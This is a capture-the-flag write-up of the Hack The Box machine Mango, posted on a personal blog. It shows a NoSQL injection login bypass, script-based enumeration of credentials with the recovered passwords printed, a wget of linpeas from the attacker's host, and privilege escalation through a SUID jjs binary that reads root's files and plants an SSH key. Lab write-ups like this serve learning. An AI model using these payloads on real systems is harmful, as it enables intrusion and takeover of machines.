Hack The Box Writeup: Mango

When life gives you mangos. This box has little to do with real mangos, but differs only 1 letter from a well-known NoSQL platform. And here is the initial access to this box. An interesting Medium box that raised my score by 30 points and from Hacker to Pro Hacker on Hack The Box..

Hack The Box Mango

[0x1] Reconnaissance & Enumeration

A new box, a new scan. It sounds boring, but every box starts with a good scan. This gives a good idea of ​​where your starting point can be at the beginning of the journey.

nmap -sC -sV -T5 -p- -oA ~/Documents/boxes/mango/magno-allports 10.10.10.162

Starting Nmap 7.80 ( https://nmap.org ) at 2020-02-27 11:37 GMT
Nmap scan report for staging-order.mango.htb (10.10.10.162)
Host is up (0.033s latency).

PORT    STATE SERVICE  VERSION
22/tcp  open  ssh      OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   2048 a8:8f:d9:6f:a6:e4:ee:56:e3:ef:54:54:6d:56:0c:f5 (RSA)
|   256 6a:1c:ba:89:1e:b0:57:2f:fe:63:e1:61:72:89:b4:cf (ECDSA)
|_  256 90:70:fb:6f:38:ae:dc:3b:0b:31:68:64:b0:4e:7d:c9 (ED25519)
80/tcp  open  http     Apache httpd 2.4.29 ((Ubuntu))
| http-cookie-flags: 
|   /: 
|     PHPSESSID: 
|_      httponly flag not set
|_http-server-header: Apache/2.4.29 (Ubuntu)
|_http-title: Mango | Sweet & Juicy
443/tcp open  ssl/http Apache httpd 2.4.29 ((Ubuntu))
|_http-server-header: Apache/2.4.29 (Ubuntu)
|_http-title: Mango | Search Base
| ssl-cert: Subject: commonName=staging-order.mango.htb/organizationName=Mango Prv Ltd./stateOrProvinceName=None/countryName=IN
| Not valid before: 2019-09-27T14:21:19
|_Not valid after:  2020-09-26T14:21:19
|_ssl-date: TLS randomness does not represent time
| tls-alpn: 
|_  http/1.1
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

You will not see a website on port 80 based on IP-address or hostname mango.htb. Then again at 443 it does. The first thing that appears is a message that the certificate is incorrect.

Tip: if you receive a certificate notification, be sure to check the certificate. Even if you expect it to be incorrect, it is often worth it. Mango’s certificate contains an interesting hostname: staging-order.mango.htb.

Before I go to view the hostname on the certificate, I first have to sift through the standard website. However, there is not immediately anything interesting to find here. It’s a search engine similar to Google, but your XSS and other tricks won’t deliver. The analytics link provides access to all kinds of data, but may be further archived under the rabbitholes.

htb-mango-zoekmachine

Then try that hostname of the certificate. That looksa lot better.

[0x2] Initial foothold

htb-mango-staging-order

Here too all kinds of ways to abuse the login form started. SQL injection didn’t work, but when trying NoSQL injection I got surprising result. A page that is Under Plantation . So there is a possibility for NoSQL injection.

username[$ne]=dopamine&password[$ne]=dopamine&login=login
htb-mango-under-plantation

Coincidentally, I recently saved a url for a handy tool that can do NoSQL injection and is suitable for MongoDB (hey, that sound like Mango;)).

git clone https://github.com/an0nlk/Nosql-MongoDB-injection-username-password-enumeration.git

Cloning into 'Nosql-MongoDB-injection-username-password-enumeration'...
remote: Enumerating objects: 56, done.
remote: Counting objects: 100% (56/56), done.
remote: Compressing objects: 100% (56/56), done.
remote: Total 56 (delta 15), reused 0 (delta 0), pack-reused 0
Unpacking objects: 100% (56/56), done.

The Python script provides you with a number of parameters, such as; the url, the names of the fields, the field to be tested and the login button. He starts a pattern and completes letter by letter. Of course I removed some superfluous output to avoid that there is a very long list.

python nosqli-user-pass-enum.py -u http://staging-order.mango.htb -up username -pp password -op login:login -ep username -m POST
No pattern starts with '0'
No pattern starts with '1'
No pattern starts with '2'
No pattern starts with '3'
No pattern starts with '4'
No pattern starts with '5'
No pattern starts with '6'
No pattern starts with '7'
No pattern starts with '8'
No pattern starts with '9'
Pattern found that starts with 'a'
Pattern found: ad
Pattern found: adm
Pattern found: admi
Pattern found: admin
username found: admin

Pattern found that starts with 'm'
Pattern found: ma
Pattern found: man
Pattern found: mang
Pattern found: mango
username found: mango
No pattern starts with 'n'
No pattern starts with 'o'
No pattern starts with 'p'

2 username(s) found:
admin
mango

Two usernames in the pocket. Now I do the same again, but for the passwords.

python nosqli-user-pass-enum.py -u http://staging-order.mango.htb -up username -pp password -op login:login -ep password -m POST

No pattern starts with 'a'
No pattern starts with 'b'
No pattern starts with 'c'
No pattern starts with 'd'
No pattern starts with 'e'
No pattern starts with 'f'
No pattern starts with 'g'
Pattern found that starts with 'h'
Pattern found: h3
Pattern found: h3m
Pattern found: h3mX
Pattern found: h3mXK
Pattern found: h3mXK8
Pattern found: h3mXK8R
Pattern found: h3mXK8Rh
Pattern found: h3mXK8RhU
Pattern found: h3mXK8RhU~
Pattern found: h3mXK8RhU~f
Pattern found: h3mXK8RhU~f{
Pattern found: h3mXK8RhU~f{]
Pattern found: h3mXK8RhU~f{]f
Pattern found: h3mXK8RhU~f{]f5
Pattern found: h3mXK8RhU~f{]f5H
password found: h3mXK8RhU~f{]f5H
No pattern starts with 'i'
No pattern starts with 'q'
No pattern starts with 'r'
No pattern starts with 's'
Pattern found that starts with 't'
Pattern found: t9
Pattern found: t9K
Pattern found: t9Kc
Pattern found: t9KcS
Pattern found: t9KcS3
Pattern found: t9KcS3>
Pattern found: t9KcS3>!
Pattern found: t9KcS3>!0
Pattern found: t9KcS3>!0B
Pattern found: t9KcS3>!0B#
Pattern found: t9KcS3>!0B#2
password found: t9KcS3>!0B#2
No pattern starts with 'u'
No pattern starts with 'v'
No pattern starts with 'w'
No pattern starts with 'x'
No pattern starts with 'y'
No pattern starts with 'z'

2 password(s) found:
h3mXK8RhU~f{]f5H
t9KcS3>!0B#2

Two hits here too. Now all you have to do is try which user matches which password, but then you will notice quickly enough when you log in.

  • Username: admin / Password: t9KcS3>!0B#2
  • Username: mango / Password: h3mXK8RhU~f{]f5H

First I try to log in with the user: admin , but this is without result. The port is open according to the Nmap scan, but apparently the user is not allowed to connect.

ssh admin@10.10.10.162
admin@10.10.10.162's password:
Permission denied, please try again.

Then we continue with the user; mango . This time I get access via SSH and I am logged in.

sudo ssh mango@10.10.10.162

The authenticity of host '10.10.10.162 (10.10.10.162)' can't be established.
ECDSA key fingerprint is SHA256:AhHG3k5r1ic/7nEKLWHXoNm0m28uM9W8heddb9lCTm0.
Are you sure you want to continue connecting (yes/no/[fingerprint])? yes

Warning: Permanently added '10.10.10.162' (ECDSA) to the list of known hosts.
mango@10.10.10.162's password:

Welcome to Ubuntu 18.04.2 LTS (GNU/Linux 4.15.0-64-generic x86_64)

[0x3] Path to User flag

There is nothing interesting in the home directory of mango, just some scripts from other HTB-ers. I browse to admin’s folder and here I find the user-flag. Unfortunately, no rights to view the content. From the session of mango I try via sudo to change the account to admin. This is fine and I have gone a step further and can use a full shell.

mango@mango:~$ su admin
Password:

$ whoami
admin

bash

[0x4] Path to Root flag

Via SimpleHTTPServer I start a web server on my own machine and download LinPeas (Linux Privilege Escalation Awesome Script) for further enumeration.

wget http://10.10.14.120:8000/linpeas.sh
--2020-02-26 09:57:54-- http://10.10.14.120:8000/linpeas.sh

Connecting to 10.10.14.120:8000... connected.
HTTP request sent, awaiting response... 200 OK
Length: 144338 (141K) [text/x-sh]
Saving to: ‘linpeas.sh’

linpeas.sh 100%[================================================================>] 140.96K 159KB/s in 0.9s

2020-02-26 09:57:55 (159 KB/s) - ‘linpeas.sh’ saved [144338/144338]

The script gives a lot of output and checks the machine for the presence of cron jobs, places where I have too many rights, vulnerable processes and so on. Twice run into / usr / lib / jvm / java-11-openjdk-amd64 / bin / jjs . Both as an interesting file and a place where admin has rights to execute where only root should have it. JJS is a command line tool used to execute commands to the so-called Nashhorn engine.

admin@mango:/tmp$ bash linpeas.sh

linpeas v2.3.4 by carlospolop
====================================( Interesting Files )=====================================
[+] SUID - Check easy privesc, exploits and write perms
[i] https://book.hacktricks.xyz/linux-unix/privilege-escalation#commands-with-sudo-and-suid-commands
/bin/fusermount
/bin/mount ---> Apple_Mac_OSX(Lion)_Kernel_xnu-1699.32.7_except_xnu-1699.24.8
/bin/umount ---> BSD/Linux(08-1996)
/bin/su
/bin/ping
/snap/core/7713/bin/mount ---> Apple_Mac_OSX(Lion)_Kernel_xnu-1699.32.7_except_xnu-1699.24.8
/snap/core/7713/bin/ping
/snap/core/7713/bin/ping6
/snap/core/7713/bin/su
/snap/core/7713/bin/umount ---> BSD/Linux(08-1996)
/snap/core/7713/usr/bin/chfn ---> SuSE_9.3/10
..
..
..
/usr/bin/pkexec ---> Linux4.10_to_5.1.17(CVE-2019-13272)/rhel_6(CVE-2011-1485)
/usr/lib/dbus-1.0/dbus-daemon-launch-helper
/usr/lib/x86_64-linux-gnu/lxc/lxc-user-nic
/usr/lib/policykit-1/polkit-agent-helper-1
/usr/lib/eject/dmcrypt-get-device
/usr/lib/jvm/java-11-openjdk-amd64/bin/jjs
/usr/lib/openssh/ssh-keysign
/usr/lib/snapd/snap-confine

On GTFOBIns I come across jjs with some well known private edge escalations. One for a shell, and one for reading files. To test if it works I try to read the output of /root/root.txt from jjs

htb-mango-gtfobin

The breakout succeeds and I now have rights to read root.txt. Fine to get the points, but yeah… .. it’s not a shell yet.

echo 'var BufferedReader = Java.type("java.io.BufferedReader");
var FileReader = Java.type("java.io.FileReader");
var br = new BufferedReader(new FileReader("/root/root.txt"));
while ((line = br.readLine()) != null) { print(line); }' | jjs

8a8ef79a7a2fbb01ea81688424e9ab15

A second method is to write data. In this case I take the content of my public key on my Parrot VM and write it to the authorized keys of the root user on Mango. With this I should be able to log in based on my private key without a password. Provided that root is allowed to connect via SSH, of course.

/usr/lib/jvm/java-11-openjdk-amd64/bin/jjs -scripting
$EXEC("echo 'ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABg[[........]]h87orudH7MJ2bFhALQ0=' > /root/.ssh/authorized_keys");

Successful! connecting as root using the authorized key was successful. And besides the root flag, I now also have a full shell on the machine. Who am I? Root!

ssh -i /root/.ssh/id_rsa mango
Enter passphrase for key '/root/.ssh/id_rsa': 

Welcome to Ubuntu 18.04.2 LTS (GNU/Linux 4.15.0-64-generic x86_64)

 * Documentation: https://help.ubuntu.com
 * Management: https://landscape.canonical.com
 * Support: https://ubuntu.com/advantage

  System information as of Wed Feb 26 09:46:26 UTC 2020
Last login: Thu Oct 10 08:33:27 2019
root@mango:~# hostname
mango

root@mango:~# whoami
root

root@mango:~# ls -l
total 4
-r-------- 1 root root 33 Sep 27 14:32 root.txt

cat root.txt
8a8ef79a7a2fbb01ea81688424e9ab15

d0p4m1n3

Ethical Hacker | Cybersecurity enthusiast | Always looking to expand my knowledge | got root?

Add comment

This site uses Akismet to reduce spam. Learn how your comment data is processed.

Your Header Sidebar area is currently empty. Hurry up and add some widgets.